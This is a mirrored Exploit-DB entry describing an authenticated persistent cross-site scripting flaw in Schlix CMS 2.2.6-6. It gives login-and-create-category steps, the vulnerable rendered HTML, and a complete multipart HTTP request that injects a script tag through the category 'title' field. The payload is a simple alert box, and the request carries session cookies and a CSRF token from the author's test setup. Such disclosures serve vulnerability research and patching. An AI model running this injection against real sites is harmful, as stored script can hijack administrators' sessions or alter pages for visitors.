bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/49837.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

182 lines
No EOL
6.4 KiB
Text
Raw Permalink Blame History

# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
# Date: 2021-05-05
# Exploit Author: Emircan Baş
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer
==> Tutorial <==
1- Login with your account.
2- Go to the contacts section. Directory is '/admin/app/contact'.
3- Create a new category and type an XSS payload into the category title.
4- XSS payload will be executed when we travel to created page.
==> Vulnerable Source Code <==
<article class="main category">
<div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
<div class="media-header-title container d-flex h-100">
<div class="row align-self-center w-100">
<div class="col-8 mx-auto">
<div class="text-center">
<h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE
</div>
</div>
</div>
</div>
</div>
<div class="breadcrumb-bg">
<div class="container">
<div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms">
<i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item">
<a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE
</div>
==> HTTP Request <==
POST /admin/app/contacts?action=savecategory HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
Content-Length: 4146
Origin: (ORIGIN)
Connection: close
Referer: (REFERER)
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="_csrftoken"
49feefcd2b917b9855cd55c8bd174235fa5912e4
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cid"
6
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="parent_id"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="guid"
ee34f23a-7167-a454-8576-20bef7575c15
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="title"
<script>alert(1)</script>
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="status"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="virtual_filename"
script-alert-1-script
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="summary"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="description"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_description"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_key"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="tags"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_available"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_expiry"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="items_per_page"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_pagetitle
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_child_categories
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_items
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[child_categories_sortby]"
date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[items_sortby]"
date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read_everyone"
everyone
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
2
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
3
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_write[]"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_selection"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_upload"; filename=""
Content-Type: application/octet-stream
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_path"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_url"
-----------------------------280033592236615772622294478489--
Reference in a new issue View git blame Copy permalink